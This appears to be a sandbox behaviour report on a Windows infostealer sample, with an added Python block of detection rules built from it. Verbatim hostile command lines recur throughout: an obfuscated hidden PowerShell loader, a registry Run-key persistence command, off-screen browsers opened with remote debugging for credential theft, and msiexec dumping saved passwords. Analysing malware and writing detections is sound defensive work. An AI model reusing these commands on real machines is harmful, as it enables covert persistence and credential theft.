Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
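The process chain above (PowerShell dot-invoking a command name sliced out of a file, an argument-less msiexec.exe spawned by that PowerShell, reg.exe writing a REG_EXPAND_SZ Run value that starts with %billigbogs% and pulls its payload from HKCU:\Software\Curetted, Chrome and Edge launched off-screen with --remote-debugging-port=9222 on a throwaway profile in Temp, and msiexec.exe children running /stext into extension-less files in Temp) is the part of this report most useful for detection. The following is an added example, not part of the Joe Sandbox report or of any vendor rule set: it turns those five observations into triage rules and runs them over constructed Sysmon-style process-creation records. The command lines in the records are copied from the report's process tree; the Sysmon field names, the parent/child fields, and the two benign control records are assumptions made for the example.

```python
"""Triage rules for the process chain listed above (added example)."""
import re
from typing import Callable, Dict, List

Event = Dict[str, str]

# Constructed sample telemetry (Sysmon Event ID 1 field names assumed).
# Indexes 0-6 carry command lines copied from the report; 7-8 are benign controls.
EVENTS: List[Event] = [
    {"Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\rPO3799039985.exe",
     "CommandLine": r'''powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)'''},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\SysWOW64\msiexec.exe"'''},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"'''},
    {"Image": r"C:\Windows\SysWOW64\reg.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"'''},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'''--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"'''},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r'''C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"'''},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": "unknown",
     "CommandLine": r'''"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate'''},
    # Benign controls (constructed): a normal MSI install and a normal browser start.
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''msiexec.exe /i "C:\Users\user\Downloads\setup.msi" /qn'''},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'''},
]

_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
_SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _base(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def run_key_env_indirection(ev: Event) -> bool:
    """REG ADD of a REG_EXPAND_SZ Run value whose data opens with %var%: the
    interpreter path lives in an environment variable and the real script is
    read from a second registry value at logon, so the Run value itself names no binary."""
    cl = ev["CommandLine"]
    return all(re.search(p, cl, re.I) for p in (
        r"\bREG\s+ADD\b", r"\\CurrentVersion\\Run\b", r"/t\s+REG_EXPAND_SZ\b", r'/d\s+"%[^%"]+%'))


def headless_debug_browser(ev: Event) -> bool:
    """Chromium browser started with a DevTools port plus a throwaway profile in
    Temp or an off-screen window: cookies and logins are then read through the
    debugging protocol by the already-running browser rather than decrypted on disk."""
    cl = ev["CommandLine"]
    if _base(ev["Image"]) not in _BROWSERS or "--remote-debugging-port=" not in cl:
        return False
    throwaway = "--user-data-dir=" in cl and bool(_TEMP.search(cl))
    return throwaway or "--window-position=-" in cl


def msiexec_stext(ev: Event) -> bool:
    """msiexec.exe has no /stext switch; it is the NirSoft save-as-text option,
    so an msiexec image running it is hosting an injected password-recovery tool."""
    return _base(ev["Image"]) == "msiexec.exe" and re.search(r"/stext\s", ev["CommandLine"], re.I) is not None


def msiexec_spawned_bare(ev: Event) -> bool:
    """msiexec.exe launched by a script host with no arguments at all: nothing for
    the installer to do, which is what a hollowing target looks like."""
    if _base(ev["Image"]) != "msiexec.exe" or _base(ev["ParentImage"]) not in _SCRIPT_HOSTS:
        return False
    return ev["CommandLine"].strip().strip('"').lower() == ev["Image"].lower()


def powershell_dynamic_invoke(ev: Event) -> bool:
    """A command name cut out of a file with SubString and invoked through a
    variable (.$var( or &$var(), so the invoke keyword never appears on the command line."""
    cl = ev["CommandLine"]
    return (_base(ev["Image"]) in {"powershell.exe", "pwsh.exe"}
            and "Get-Content" in cl and ".SubString(" in cl
            and re.search(r"[.&]\s*\$\w+\s*\(", cl) is not None)


RULES: Dict[str, Callable[[Event], bool]] = {
    "run_key_env_indirection": run_key_env_indirection,
    "headless_debug_browser": headless_debug_browser,
    "msiexec_stext": msiexec_stext,
    "msiexec_spawned_bare": msiexec_spawned_bare,
    "powershell_dynamic_invoke": powershell_dynamic_invoke,
}


def evaluate(events: List[Event]) -> Dict[int, List[str]]:
    """Map each event index to the rule names it triggers; silent events are omitted."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[i] = fired
    return hits


if __name__ == "__main__":
    for idx, names in evaluate(EVENTS).items():
        print(f"event {idx}: {_base(EVENTS[idx]['Image'])} -> {', '.join(names)}")
```

Each of the seven report-derived records fires exactly one rule and both benign controls stay silent. The browser rule deliberately needs the DevTools port plus a second oddity (a Temp profile or a negative window position), because developers do start Chrome with --remote-debugging-port on its own; the msiexec rules need no such qualifier, since neither an argument-less msiexec.exe under a script host nor a /stext switch has a legitimate reading.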
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\rPO3799039985.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pstorec.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\rPO3799039985.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: rPO3799039985.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbO source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb{ source: powershell.exe, 00000002.00000002.144031828230.0000000008A68000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 00000002.00000002.144033904631.00000000094FE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.148889312327.00000000045CE000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Noncontributory $Chocking $Bearnaisesovserne12), (Welshy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hypoxanthic154 = [AppDomain]::CurrentDomain.GetAss
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skorpefrie)), $Rewrapt).DefineDynamicModule($Homilist, $false).DefineType($Recleaner, $Atombevbningens, [System.MulticastDelegate])$An
              Source: C:\Users\user\Desktop\rPO3799039985.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_214D7240 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 4_2_214D7240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_03268460 push eax; mov dword ptr [esp], edx 2_2_03268474
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_093D11E1 push 8BD68B50h; iretd 2_2_093D11E6
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_214DB146 push ecx; ret 4_2_214DB159
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_214F343D push esi; ret 4_2_214F3446
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_214F6F69 push esp; iretd 4_2_214F6F6A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_21DE2806 push ecx; ret 4_2_21DE2819
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_21DF1219 push esp; iretd 4_2_21DF121A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044B090 push eax; ret 10_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044B090 push eax; ret 10_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00451D34 push eax; ret 10_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00444E71 push ecx; ret 10_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe
              Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Besmears

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_004047CB
              Source: C:\Users\user\Desktop\rPO3799039985.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
